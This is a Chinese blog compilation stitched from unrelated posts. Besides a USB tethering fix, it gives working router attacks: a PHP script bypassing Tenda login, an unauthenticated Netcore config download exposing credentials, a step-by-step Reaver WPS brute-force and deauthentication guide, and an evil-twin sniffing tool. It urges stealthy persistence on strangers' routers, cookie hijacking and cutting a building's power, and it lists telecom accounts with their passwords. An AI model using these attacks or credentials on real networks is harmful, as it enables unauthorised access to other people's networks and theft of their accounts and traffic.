声明：以下内容来自于V2社区，个人收藏，如有侵权，还请告知，谢谢！

使用 USB 共享手机的网络时，电脑变得很卡，尤其是系统自带的应用，如打开网络与共享中心，使用 Cortana 搜索，甚至是在任何地方用系统自带输入法输入，都很卡！拔掉 USB 线之前卡掉的操作都瞬间完成了。 然而第三方软件并不受影响，比如我发这个帖子，我等了半分钟把输入法换成了手心，然后就非常顺畅的打完了字，发出来了，要使用自带输入法，特别是使用微软拼音中文状态下，大概标题还没输完。 有需要用 USB 共享网络的应该很少，不知道有没有人遇到同样的情况。我的手机是闲置的 MI4 ，当作免费的移动无线路由器

系统是 win10 X64 10.0 版本是 10586 4 核 U 8G 内存 睿速 T9 256G 开机都是秒开，为毛我一插手机 USB 线，打开 USB 网络共享，电脑就卡成渣，但是 CPU 和内存都不怎么彪，这是嘛情况啊，各位有没有遇到过、、、？求解

通过搜索，说什么在设备管理中心禁用一下再启用这个网卡，可是还是没有效果.... 各位 V 友 有没有什么办法解决呢？或者是科普一下，这是什么原因！

解决办法：

设备管理器中，选择 usb 共享的那个网卡（一般是名字里有 NDIS 这几个字母的）， 

然后右键，更新驱动程序，然后选下边那一项（从计算机设备列表中选取）  ， 

然后去掉“显示兼容设备”的对钩，

然后在列表左边找到“ Microsoft ”，然后在右边拉到最下边，选择“远程 NDIS 兼容设备”这个，

之后确定即可。

 

作者：杨晓恒 

链接： http://www.zhihu.com/question/35185870/answer/93712562 

来源：知乎 

著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

刚好今天住的地方网络出了问题，就打开手机随便搜索了一下附近的wifi，发现有个可以用钥匙链接，毫不犹豫地连接上去，故事就此展开了：

习惯性地在连接上陌生wifi后进一下后台，用浏览器打开网关，来到这个页面：http://192.168.0.1/login.asp

一看，感觉好眼熟啊，这个和之前在乌云看到的那个腾达漏洞很相似啊，为了验证一下，F12后切换到Network选项卡下面，重新请求一遍，发现从首页index.asp 301 跳转到 login.asp ，而且没有cookies，那么是否是真的是那个漏洞呢？利用php的curl写了个简单的脚本：

<?php 
echo "找到路由的备份文件就好了，密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具的地址栏输入：http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg，然后点获取当前地址源码。http_passwd就是登陆密码".'<br>';
$headers = array(
    // 'GET /index.asp HTTP/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
 ?>

运行后的结果如下：

从图上看，基本上可以判断是成功了得，再ctrl+u :

开始很纳闷，为啥没有宽带账号/密码，初步判断是静态IP或者是动态获取IP，从图中可以看到wifi密码是八个8--88888888 ，把配置文件下载下来后就可以看到后台的登陆密码了：

http_passwd=后面的就是路由器后台登陆密码，当然，你也可以不下载配置文件，直接在后台修改登录密码，但是这样容易被路由器的所有者发现，不建议这样做，进入路由后，如果有wps功能，请帮他打开，哈哈，这样即使他改了密码，你通过wps还是很可以轻松的拿到密码---拿下路由器。更多的关于拿下路由器后的各种姿势，请看这篇文章：破解了你的路由密码后，我还可以这样做，绝对不是蹭你网这么简单

      这个漏洞在13年的时候就出来了，而且还有很多成品工具可以一键破解，可是这些厂家和我们的人民 没有多少安全意识，特别是在公共场合的wifi，朋友们在使用的时候，一定要注意，别在这些场所进行资金操作，或者是与个人隐私相关的操作，因为，谁也不知道咋某个角落是否有一个骇客正在监听或者嗅探 or 钓鱼呢？ OK ，

01.终端输入#lsusb，会看到再出现的几行中有USB、ralink等字样，一般是倒数第二行。。。确定下ID代码:ID 148f:5370 Ralink

02.下载驱动，可以google/百度搜索关键字----ralink rt2870/3070(根据自己的网卡型号来搜索)----进官网后选择Download字样的，只要芯片型号对就行，你说那要是不知道芯片型号？找度娘--搜索---你USB网卡型号+芯片型号（比如托实N95芯片型号）---度娘会告诉你芯片型号的！好了，这步搞定。

03.下载玩之后解压，tar -zxvf filename.tar.bz2 类似的。解压完毕后进入解压完毕的那个文件夹，然后进入 os/linux 目录下，编辑config.mk，可以使用命令 leafpad config.mk 之后在leafpad的窗口里搜索并找到，修改下面这两句，启用WPA特性：

HAS_WPA_SUPPLICANT=y  

HAS_NATIVE_WPA_SUPPLICANT_SUPPORT=y

04.编译（需要root权限），make , makeinstall ,modprobe rt3070(根据自己的网卡型号)，exit 。

注意:执行modprobe rt3070可能会产生一个警告： WARNING: All config files need .conf: /etc/modprobe.d/ndiswrapper, it will be ignored in a future release. 无视掉，没有关系！！！或许还有其他的警告或者是提示都不用管，稍等执行ifconfig -a 查看无线网卡驱动是否安装激活。

如果想系统每次启动就会自动驱动这张网卡，可以将模块加入/etc/modules，这样代码:echo rt3070 >> /etc/modules

---

下面介绍一下reaver与ping 之间的详细参数 和一些破解时设置的技巧，菜鸟请看，绝对有用，老鸟无视，直接飞过~~~~~

【Reaver v1.4 参数说明】

-i, --interface=<wlan> Name  of  the  monitor-mode

interface to use

网卡的监视接口，通常是 mon0

-b, --bssid=<mac> BSSID of the target AP AP 的

MAC 地址

Optional Arguments:

-m, --mac=<mac> MAC of the host system

指定本机 MAC 地址，在 AP 有 MAC 过滤的时候需要使用

-e, --essid=<ssid> ESSID of the target AP 路由器的

ESSID，一般不用指定

-c, --channel=<channel> Set the 802.11 channel for

the interface (implies -f) 信号的频道，如果不指定会自动扫

描

-o, --out-file=<file>Send output to a log file [stdout]

标准输出到文件

-s, --session=<file> Restore a previous session file

恢复进程文件

-C, --exec=<command> Execute  the  supplied

command upon successful pin recovery pin 成功后执行

命令

-D, --daemonize Daemonize reaver

设置 reaver 成 Daemon

-a, --auto Auto  detect  the  best  advanced  options

for the target AP 对目标 AP 自动检测高级参数

-f, --fixed Disable channel hopping

禁止频道跳转

-5, --5ghz Use 5GHz 802.11 channels 使用 5G 频道

-v, --verbose Display  non-critical  warnings  (-vv  for

more) 显示不重要警告信息 -vv 可以显示更多

-q, --quiet Only display critical messages 只显示关键信息

-h, --help Show help 显示帮助 Advanced Options:

-p, --pin=<wps pin> Use the specified 4 or 8 digit

WPS pin

直接读取 psk（本人测试未成功，建议用网卡自带软件获取）

-d, --delay=<seconds> Set the delay between pin

attempts [1]

pin 间延时，默认 1 秒，推荐设 0

-l, --lock-delay=<seconds> Set the time to wait if

the AP locks WPS pin attempts [60] AP 锁定 WPS 后

等待时间

-g, --max-attempts=<num> Quit  after  num  pin

attempts

最大 pin 次数

-x, --fail-wait=<seconds> Set the time to sleep after

10 unexpected failures [0]

10 次意外失败后等待时间，默认 0 秒

-r, --recurring-delay=<x:y> Sleep for y seconds every

x pin attempts

每 x 次 pin 后等待 y 秒

-t, --timeout=<seconds> Set the receive timeout

period [5] 收包超时，默认 5 秒

-T, --m57-timeout=<seconds> Set  the  M5/M7

timeout period [0.20] M5/M7 超时，默认 0.2 秒

-A, --no-associate Do not associate with the AP

(association must be done by another application)

不连入 AP（连入过程必须有其他程序完成）

-N, --no-nacks Do not send NACK  messages

when out of order packets are received

不发送 NACK 信息（如果一直 pin 不动，可以尝试这个参数）

-S, --dh-small Use small DH  keys to improve crack

speed

使用小 DH 关键值提高速度（推荐使用）

-L, --ignore-locks Ignore locked state reported by the

target AP 忽略目标 AP 报告的锁定状态

-E, --eap-terminate Terminate  each  WPS  session  with

an EAP FAIL packet

每当收到 EAP 失败包就终止 WPS 进程

-n, --nack Target AP always sends a NACK [Auto] 对

目标 AP 总是发送 NACK，默认自动

-w, --win7 Mimic a Windows 7 registrar [False] 模拟

win7 注册，默认关闭

PIN码

破解简单解释：

PIN码分前4和后4，先破前4只有最多一万个组合，破后4中的前3只有一千个组

合，一共就是一万一千个密码组合。 10的4次方+10的3次方=11000个密码组合。

   当reaver确定前4位PIN密码后，其任务进度数值将直接跳跃至90.9%以上，也就是

说只剩余一千个密码组合了。总共一万一千个密码!

学习过程

1.在虚拟机找到点击打开。如果电脑装有多个无线网卡，请先发指令

ifconfig -a   确认你用哪一个网卡WLAN0或是WLAN1

（下面的指令都是以单一网卡WLAN0为例）

2.出现root Shell窗口。敲入第一条命令“ifconfig wlan0 up” 加载

usb网卡。

接下来“airmon-ng start wlan0” 监听模式已激活到了

mon0。

如果出现网卡没有正确加载，8187驱动RF-kill的参考后记1解决问题。

3.第二条命令“airodump-ng mon0” 查看周边路由/AP的信息。

记录下你要学习的路由MAC地址。提供几个查看可以使用PIN码学习路由的方法。

特别提示：只有AP开启了WPS、QSS功能，才可以用PIN法学习PSK密码!如何查看

AP是否开了WPS、QSS呢提供几个小方法？

a) reaver1.3下使用使用命令walsh -imon0-C 查看针对xiaopangOS3.2版本

b) reaver1.4下用新的指令：WASH -i mon0 -C  C是大写在wps locked一项中有显示的。

c) WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器

按钮也可以连接”，就确认此AP开了WPS、QSS。

d) 在螃蟹软件中——可用网络——模式下带N,G的这个不是很准

最准确的是下面这个选项

点击PIN输入配置，选择接入点，哈哈出来了吧，这里面都是可以学习的目标

需要注意的是，查看后面有的是不支持pin码连接的，这样的就别弄了，后果你知道。

1. 重新开启一个root Shell窗口，第三条命令“reaver -i mon0 -b MAC -a -S -vv” 抓PIN

码。注意，MAC中冒号不可省略，MAC地址的字母大小写均可，-S是大写字母， -vv

是两个V不是W！# _) }

-i 监听后接口名称

-b 目标mac地

-a 自动检测目标AP最佳配

-S 使用最小的DH key（可以提高破解速度）  

-vv 显示更多的非严重警告

-d 即delay每穷举一次的闲置时间 预设为1秒

-t 即timeout每次穷举等待反馈的最长时间

-c指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 （非TP-LINK路由推荐–d9 –t9参数防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv）

小结-学习时应因状况调整参数（-c后面都已目标频道为1作为例子

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1

目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1

目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

学习开始了，然后就是漫长的等待。

如果信号好的话2-4小时内进度走到100%你就会有惊喜发现。

PIN破密对信号要求极为严格，如果信号稍差，可能导致破密进度变慢或者路由死锁等（重

复同一个PIN码 或 timeout）。AP关闭了WPS、或者没有QSS滴，会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX）

5．如果出现超长的wpa PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”

MAC为目标的mac地址，WPA PSK为获取到的超长密码。作用是将指定的pin码获取

wpa密码psk。

6.常用命令截图

7.不是所有的路由都支持pin学习。AP关闭了WPS、或者没有QSS滴，会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)  学习过程中也可随时随地按

Ctrl+C终止破解，重复同一个PIN码 或 timeout可终止，reaver

会自动保存进度。保存进度后重复第2-4项内容，先看看AP信号强弱或是否关机，继续

学习，则重复命令reaver -i mon0 -b MAC -vv这条指令下达后，会让你选y或n，选y后

就继续了。当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%

以上，也就是说只剩余一千个密码组合了（总共一万一千个密码）。这个时候离成功就差

一步之遥了，呵呵hold住哦！！！

小技巧：只要Root Shell窗口不关闭，按方向键的上下会出现你输入过的命令方便调用。 8.虚拟机中快照的保存方法

找到这两个图标，第一个是保存快照。第二个图标是加载上一次的快照。

快照的作用：类似迅雷的断点续传，可以保存上次学习的进度，防止目标pin僵死，无法

继续前功尽弃，这是光盘启动、u盘启动、硬盘启动都无法避免的。而虚拟机则可为自己

上一份保险。

载入快照后如果无法继续，可以尝试先卸载掉usb网卡，然后重新加载。然后在开启窗口  

继续上次的学习。学习过程中也可随时随地按Ctrl+C终止破解，重复同一个PIN码 或

timeou t可终止，reaver会自动保存进度。

reaver -i mon0 -b MAC -vv这条指令下达后，会让你选y或n，选y后就继续了。

9.光盘启动、u盘/硬盘启动保存学习进度的方法

reaver1.3的保存路径：打开桌面最后边一个图标xfec 定位到/etc/reaver下，有一个wpc

后缀的文件，名字是你学习的目标的mac地址，复制到你的U盘，路径是/mnt/sdb1（一

般是这个，自己找找，要是没有东西就右键mount），以后重启到xiaopanOS，把这文件

复制到原来的路径，再试试，可以载入进度了！o(∩_∩)o 哈哈

reaver1.4的保存路径：保存目录：/usr/local/etc/reaver

如果xfe文件管理器未获得ROOT权限。请先运行root shell后输入xfe即可获得root权

限。保存方法同上。下次重启动后，再手工复制到/etc/reaver/ 目录下即可

MAC地址.wpc 其实是个文本文件，格式与破密用字典酷似，其第一行和第二行，分别是

4位数和3位数的指示位置数（+4）。如果进度到99.9%后，AP死机，可打开它，总共1000

个3位数，找出剩余的十几个PIN码，用QSS、WPS客户端软件,手动测试、破密。

如果是跑了99.99%死机,  意味吗？  你懂的吧？ 最后一个PIN就是。

以下这个命令是指定PIN码，获得WPA 密码PSK

reaver -i mon0 -b MAC -p PIN8位数

如果上述措施不后，仍不见PSK密码，可能因软件原因，漏码了！需要重新跑后三位数！

（前四位正确的话）reaver -i mon0 -b MAC -p PIN前4位数

1.遇见8187驱动RF-kill的  xiaopanos

对8187的网卡支持不是太好，有时会出现驱动加载不了，就是输入第一条命令

后出现operation not possible due to RF-kill，我想大部分人也遇到过把。新版本0.34使用

命令rfkill unblock all解决这个问题，容易出现问题的是0.3.2版本的。

第一种尝试的解决办法：这时候就断开USB，等上大概10几秒把再插上，连续插拔几次

总有一次会好。

第二种尝试的解决办法：先运行一下奶瓶扫描一会，然后退出奶瓶。虚拟机USB图标（USB

图标上的小点）由深绿变成浅绿色，变浅绿就输入

ifconfig wlan0 up

airmon-ng start wlan0

第三种解决办法：出现错误后的解决

a.Root Shell窗口敲击命令“ifconfig -a”，查看最后一项是否出现wlan0，这个就是你的无

线网卡。如果没有出现拔插网卡，直到测试出现wlan0。

b.接下来输入第二条命令“ifconfig wlan0 up”,接下来第三条“airmon-ng start wlan0”载入

网卡。如果出现operation not possible due to RF-kill，不要惊慌继续输入命令“airmon-ng start

wlan0”多输入几次，然后拔出USB网卡，再插入，重复第2步的命令。一般情况下就会

正常载入了括号内只会显示monitor mode enabled on mon0，不会出现operation not possible

due to RF-kill，如果不行以上步骤再次重复，直到解决。

c.输入“airodump-ng mon0”（如果括号内显示的是monitor mode enabled on mon1，相应的

命令就改为airodump-ng mon1，其他的类似），测试一下，要是可以正常扫描，说明8187L加载成功，就可以reaver了，你懂的！

d.小技巧：只要Root Shell窗口不关闭，按方向键的上下会出现你输入过的命令方便调用。

2. reaver

破密进度表 全能保存办法

用u盘或者硬盘启动xiaopanos可以保存进度，重启不会丢失，方法如下：

打开桌面最后边一个图标xfec 定位到/etc/reaver下，有一个wpc后缀的文件，名字是你

破解的mac地址，复制到你的U盘，路径是/mnt/sdb1（一般是这个，自己找找要是没有东

西就右键mount），以后重启到xiaopanOS，把这文件复制到原来的路径，再试试，可以

载入进度了

reaver的进度表文件保存在/etc/reaver/MAC地址.wpc  用资源管理器，手工将以MAC地

址命名的后辍为.wpc的文件拷贝到U盘或硬盘中，下次重启动后，再手工复制到

/etc/reaver/ 目录下即可。

MAC地址.wpc 其实是个文本文件，格式与破密用字典酷似，如果进度到99.9%后，AP

死机，可打开它，总共1000个3位数，找出剩余的十几个PIN码，用QSS、WPS客户

端软件,手动测试、破密。

3. PIN

破密降低timeout、同码重复的非常给力措施之一

首先是PIN难易与MAC无关的！主要跟路由所在频道的 信道拥挤程度相关！（同一频道

中有几个路由，特别是强信号的AP会相互干扰,造成 timeout

一般AP默认频道cn 6，部分为

解决“同频干扰”、“邻频干扰”的原则：设法 调虎离山(这个我想大家都懂的)。

将能调动的AP远离破密AP至少3个CN以上

5.如果90.9%进程后死机或停机，可以使用-p参数

请记下PIN前四位数，用指令：reaver -i mon0 -bMAC -a -vv -p XXXX(PIN前四位数

会从指定PIN段起破密.

6.只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!如何查看AP是否开了WPS、QSS呢？

reaver1.3下 使用airodump-ng -mon0 MB一栏下，出现 54e. 是开11N的WPS的（不是

54e是有小数点的54e.）

reaver1.4除可使用上述命令外也可以用新的指令：WASH -imon0-C在wps locked一项中

有显示的。

WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按

钮也可以连接”，就确认此AP开了WPS、QSS。PIN破密对信号要求极为严格，如果信

号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码 或timeout）。AP

关闭了WPS、或者没有QSS滴，会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)

7. 通过mac地址查找路由品牌 有时候

破解时SSID通常被改成其他的 不好判断 可以打开下面这个网址：

http://standards.ieee.org/develop/regauth/oui/public.html

输入你的ap mac的前三位，接下来就不用说了吧？破解 至少也要知道对方用的是啥路由

总结发现这个方法最快 也最好用 对破解有一定的帮助

8. 很简单地扫描支持pin解的路由

在xiaopanos下打开一个root shell 如果是1.3或之前的的就键入walsh -i mon0 -C(一般是

这个，不是的话改成你的网卡,注意c要大写)

1.4要把walsh改成wash 片刻就罗列出周围支持wps的路由，在wps locked一项如果是

N的话就可以pin破解

9. 在

xiaopanOS 中，打开的窗口最小化后，就找不到了，因为不像windows有下方的任

务栏，此时按Alt+Tab键，会出现一个弹出菜单，选择rootshell，原来最小化的窗口就会

出现了。

10. PIN僵死锁定后，无奈的方法。也可以攻击隐藏ssid的路由（不推荐使用）aireplay-ng-0 1000 -a SSID

的MAC -c 合法客户端的MAC 网卡端口 就是让客户端断开连接1000次

11. 【公共

wifi密码】

中国移动：卡号：15821275836 密码：159258；卡号：15800449592 密码：159258；卡

号：15800449954 密码：159258；卡号：15800449940 密码：159258。中国电信：但凡

你的手机能搜到电信的chinanet的热点覆盖，全国公免账号：07953591377密码3591377。

有福同享！

12. 利用虚假连接调整天线，快速穷举pin码的方法;

首先利用8187管理软件来精确调整天线的位置。（因为8187界面非常直观，友好，可以

看到当前连接ap源的信号强度和接收品质的动态条）把信号先调得接收强度，接收品质

为最优秀为破解来打下扎实的基础。

   最笨的方法就是把要破解的信号连接上。那你会问了能连接上就不用破了。是兄弟们没

有反应过来，呵呵，听我慢慢说:你可以虚假的连接啊。比如：要破这个1234p这个ssid

的信号。双击这个信号后会弹出输入密码对话框，你可以按10个1嘛。下面也一样输入

10个1 。这样就会虚假连接。能在8187管理界面上看到信号接收强度和接收品质的动

态图。虽然上不去网，但是完全可以根据这两项把天线调整到最佳的接收状态，使之

信号校对到最优秀状态。把信号调整好后，你说破解顺利不啊？还会出timeout这种丢包

情况吗？会相当顺利的。呵呵呵呵。

配合破解要有好的定向天线，我是硬件版块的兄弟。我们经常自己diy大增益的天线。使

我们的信号强上更强，这叫好马配好鞍，使破解无往而不利，综上所术：这就是我要分享

的小经验。我最慢也没有超过30分钟 的啊。一般全是15分钟就搞定了。。新手兄弟：

明白了吧 .

13. 破解隐藏SSID前提:一定要有合法的客户端连上

1.在bt3/4/5下先打开一个shell,输入airodump-ng 网卡端口

2.打开另一个shell,输入aireplay-ng-0 10 -a AP的MAC -c 合法客户端的MAC 网卡端口,

可能这个命令由于频道不对会出错,这时就要多重输几次(重输技巧:只要按一下向上键就

可以了,如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止。

3.然后就可以在上个shell,看到显示出来的SSID图是借用论坛的XD的,希望是不会介意

吧 连接隐藏SSID: 输入SSID选好网络身份验证加密方式及破解出来的密码,点上即使此网络未广播也进行

连接,然后确定就看到右下角小电脑摇起来了吧！如果连不了,可能是因为这个信号太弱和

有太强的信号影响,这时就要把可用网络里的AP列表全部删除,只留下那个刚新增的AP就可以了.如果还是连不上,那就是因为这个信号太弱,windows认为它没有连接的价值,又

或是AP还设置了MAC、IP过滤。

14.在xiaopangOS下修改usb网卡mac地址的方法

macchanger -m 00:16:6f:ab:25:f9 wlan0

15. PIN

破密正常运行中，信号质量也很好的情况下，突然出现出现同码循环和大量

timeout，可能是如下原因造成的（排除关机状态）。

reaver只支持11N的PIN破密，11n先验证前4位码，11g也有PIN功能，是全码验证。

现在多数AP的无线模式是混和11bgn，当有11g设备接入时，AP自动从11N降至11g

此时,reaver会出现同码循环重复timeout! 甚至会出现WARNING: Failed to associate with

XX:XX:XX:XX:XX:XX  (ESSID: XXXX)实证中，在排除同频干扰因素后，通过扫描无线

网络，发现路由器，确实从54e.模式降为54.模式了。有人把此种现象称为临时性WPS、

PIN功能自锁从收集情况分析，目前破密的主要是TP-LINK的路由器！

解决办法:

等待这个１１g设备退出无线接入，断电重启，AP自动从11g恢复至11N模式。如果遇

到上很长很长时间不重启的顽固AP，我想最有效的办法就是我们动手帮它重启，找到附) ~

近（路由器一定离我们不远）楼内单位总电源开关！下步该知道怎么办了吧————终)

极秘籍：拉开关断电，再推上开关，回家继续。

相关推荐：

破解了你的路由密码后，我还可以这样做，绝对不是蹭你网这么简单

Kali套件之nikto扫描网站漏洞应用小计

对于升级后的aircrack-ng 和以前的 大不一样，特别是监听模式的设置，很多人会出现找不到设备会命令出错的各种原因我们先去官网（http://www.aircrack-ng.org/doku.php?id=compatibility_drivers）确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作：

第一步：在设置监听模式前先输入airmon-ng check kill结束进程

第二步：和以前一样载入网卡airmon-ng  start wlan0（自己的网卡名）

第三步：他会自动创建一个  wlan0mon接口 记住这个 接口名 而不是以前的mon0

第四步：建立监听 airodump-ng wlan0mon

如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式，第二你的wlan0mon输入错误，第三网卡被其他进程给调用无法获取

第三种情况解决方法：

执行airmon-ng check kill

执行 ifconfig wlan0mon up

airmon-ng stop wlan0mon

最后跳回上面的第二部进行

如果还不行 那就拔掉网卡 或重启

再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头

如果没有 就 ifconfig wlan0 （或者wlan1 wlan2.。。。载入） up

发现了  并载入了 wlan0跟着第一步走一般不会出错

相关推荐：

破解了你的路由密码后，我还可以这样做，绝对不是蹭你网这么简单

Kali套件之nikto扫描网站漏洞应用小计

Mrxn声明：此文章只能用于学习研究，禁止用于非法用途，否则后果与本博客无关。

0X1：总体描述

磊科NW系列路由器存在不需要登录路由器就可以下载路由器配置文件param.file.tgz，通过WinHEX查看此配置文件可得到路由器配置信息，包括路由器登录用户名密码，宽带账号、密码，动态域名登录用户名密码，WiFi_ssid wifi_key等等。

注：前提是你已经破解了WiFi密码，连接上了WiFi。教程：WiFi破解教程，资源下载，自己看吧。 没有的可以自己测试一下自己的路由器

0X2：具体操作

eg：路由器的网关是192.168.1.1 ，打开IE，在地址栏输入：http://192.168.1.1，然后回车>>>>>>

是不是需要账号密码？下面就是重点：

我们点击登录窗口右上角的那个 红X (鼠标位置，给小白的，老鸟飞过吧 ^_^) ，关掉登录窗口，然后在地址栏的末尾添加上param.file.tgz，地址改变为：http://192.168.1.1/param.file.tgz 此时神器的事情就发生了哦，如下图所示：

下载保存吧。注：只能用IE自带的下载，其他的下载不好使。 

下载完后，就是读取配置文件的时候了；

0X3，用神器WinHex读取 **.file.tgz 配置文件

WinHex 绿色免安装版下载 （点击下载）

路由器登录用户名+密码;

WiFi_ssid + WiFi_key （骚年必须先破解了才能蹭网执行上面的步骤吧 O(∩_∩)O哈哈~）；

路由器的型号，固件版本通通都知道了吧。 

0X4，End

你得到了这些后可以干很多事情的的，比如cookies劫持，登录他的空间，微博，百度账号。内网嗅探，渗透deng 自由发挥吧<<<<<

也可以参看我的另一篇教程：破解了你的路由密码后，我还可以这样做，绝对不是蹭你网这么简单

好了，教程到此结束了，写教程真的很累，原创，转载请注明出处Mrxn's Blog，谢谢。

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

3vilTwinAttacker可以帮助渗透测试人员建立一个虚假的钓鱼WiFi，表面上这是一个提供上网服务的正常AP（网络接入点），而实际上它却在不知不觉嗅探获取网络流量。

软件依赖

推荐使用Kali linux
Ettercap
Sslstrip
Airbase-ng（包含于aircrack-ng）
DHCP
Nmap

DHCP安装（Debian）

Ubuntu 
$ sudo apt-get install isc-dhcp-server

Kali linux

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

DHCP安装（RedHat）

Fedora

$ sudo yum install dhcp

工具选项

 

Etter.dns: Edit etter.dns to loading module dns spoof.
Dns Spoof: Start dns spoof attack in interface ath0 fake AP.
Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials.
Sslstrip: The sslstrip listen the traffic on port 10000.
Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window.
Deauth Attack: kill all devices connected in AP (wireless network) or the attacker can Also put the Mac-address in the Client field, Then only one client disconnects the access point.
Probe Request: Probe request capture the clients trying to connect to AP,Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.
Mac Changer: you can now easily spoof the MAC address. With a few clicks, users will be able to change their MAC addresses.
Device FingerPrint: list devices connected the network mini fingerprint, is information collected about a local computing device.

视频演示

原版（需要梯子，本博客提供，请搜索）：http://www.youtube.com/watch?v=Jrb43KVPIJw 

国内通道：http://v.youku.com/v_show/id_XOTE4NDM1NDcy/v.swf.html 

下载地址：github

注：最近有很多童鞋反应学校的联通拨号认证太不人道，所以我抱着学习试一试的心态，

做了一下测试，只做学习研究参考，不承担相应后果，如果你继续往下看，

就表明你默认同意自愿承担所有责任，与本博客无关。

第一种方法：手动修改深澜客户端名称支持深澜客户端校园网

PS：要是Srun3000这个名字不行， 就改成Srun3K；反之一样的道理！

 另外，博主实验的是猎豹wifi 哟，其他的开wifi的软件应该也能用吧！

最新版猎豹wifi下载:不用找了！

       1、首先打开任务管理器；

2、再找到深澜的进程；发现深澜客户端的进程名是Srun3000    (1).exe，跟正常的Srun3000.exe进程名不一样

3、然后再到深澜的安装目录下面，找到对应的文件，如下图：

4、再选中那个文件，右键重命名把它改回Srun3000.exe这个名字，即可！

 5、最后再登录你的深澜，然后再开启猎豹免费WIFI即可！

PS：这里再提多一种情况：使用深澜客户端，猎豹WIFI会自动、闪退或者重启

出现上面的主要原因还是深澜客户端的名字被修改导致的，请按上面的手动解决办法尝试下，

       这里再提下深澜客户端的文件名
       旧版本：srun3000.exe
       新版本：srun3k.exe

第二种方法：补丁支持深澜校园网

   1、先下载支持补丁

   补丁下载：

    2、然后再把它解出来，放到深澜的客户端目录下面
    3、然后再运行支持补丁即可，最后一步当然是运行你的猎豹免费WIFI啦！

第三种方法：利用沙盘支持深澜校园网客户端

       1、先下载沙盘： （只能是在32位上运行 64位的是无效的！）

       2、从沙盘里面运行你的深澜客户端（如下图）

       3、登录后，再开启你的猎豹免费WIFI即可！

第四种方法：简单方法动手支持深澜校园网客户端

       1、先开启深澜客户端联网
       2、接下来右键打开任务管理器，找到深澜的进程结束掉。下面再继续开启你的猎豹免费WIFI即可！

   3、登录客户端联网，开启你的猎豹免费WIFI即可。

再次更新：打开客服端，输入账号密码 登陆后直接重启 之后再开猎豹wifi 就完美解决，不过方法不怎么好，嘿嘿 但是对于新旧版本都能搞定！

猎豹自动退退出解决方法：使用深澜客户端，猎豹wifi自动重启

确保您使用的猎豹wifi是最新版版本，下载地址：
http://wifi.liebao.cn 

深澜客户端文件名
旧版本：srun3000.exe
新版本：srun3k.exe

需要确保exe的文件名正确，如果文件名不正确，请按以下步骤操作：
1、退出猎豹wifi，退出深澜客户端
2、到深澜客户端文件目录下，找到文件-右键-重命名
3、名称修改成srun3000.exe，运行srun3000.exe，再运行猎豹wifi，查看猎豹wifi会不会自动重启
（如果不会自动重启，就完成了，如果会自动重启，退出猎豹wifi看第四步）
4、再把文件名修改成srun3k.exe，运行srun3k.exe，再运行猎豹wifi，查看猎豹wifi会不会自动重启

这里主要强调的是深澜的客户端文件名要正确，不能任意修改。

文章长期更新，欢迎评论或者留言反馈情况，我会尽量解决！

欢迎大家转载，相互学习，记得带上我的博客地址；https://mrxn.net  谢谢！严重鄙视复制别人的去装逼！

 

 

目前安卓市场上WIFI密码破解类软件多如牛毛，但是事实上能破解密码的几乎没有。大多数都是分享类软件，通过调用服务器已经分享过的热点从而达到“破解”的目的。而如今一款由中学生制作的“幻影WiFi”App带来了大家迫切需要的，它可以算得上真正的WIFI密码破解利器“幻影WIFI”。

据悉，由于幻影WIFI v3.0一时半会儿还不会发布，不过会内测，所以作者还是决定更新了最后一次2.X系列最终版，全新风格，蹭网更轻松。幻影WiFi的字典生成器，可生成更多密码，破解更容易。

幻影WIFI 2.9991更新内容：
2014-08-13 v2.9991
1.去除破解前的检测响应
2.增加模式切换，解决部分机型破解不动
3.增加侧滑菜单，去除主页几个图标
4.调整界面布局，修改默认背景，美化界面
5.高级功能直接改为密码查看
6.幻影WIFI破解记录升为0.4
7.更改帮助说明
8.设置中增加”关闭WIFI”,用于提示退出时是否关闭WIFI
9.加入“后台运行”选项，相当于HOME键使用方法：字典管理中选择字典（可选）→开始破解→弹出WIFI列表→选择你要破解的WIFI
主界面和通知栏有破解动态，破解成功后幻影WIFI会弹出来。支持暂停破解、后台破解、锁屏破解。破解原理：字典破解。用字典（密码集合）里有的密码去逐一尝试连接。字典用法：点击“字典管理”，会看到一些内置在SD卡“aiHuanying”目录下的txt文件，它们就是字典，选择字典有两种方法，一是长按字典，选“设为当前字典”，二是点击字典后再点“设为当前字典”，如果没看到字典，请重启软件。
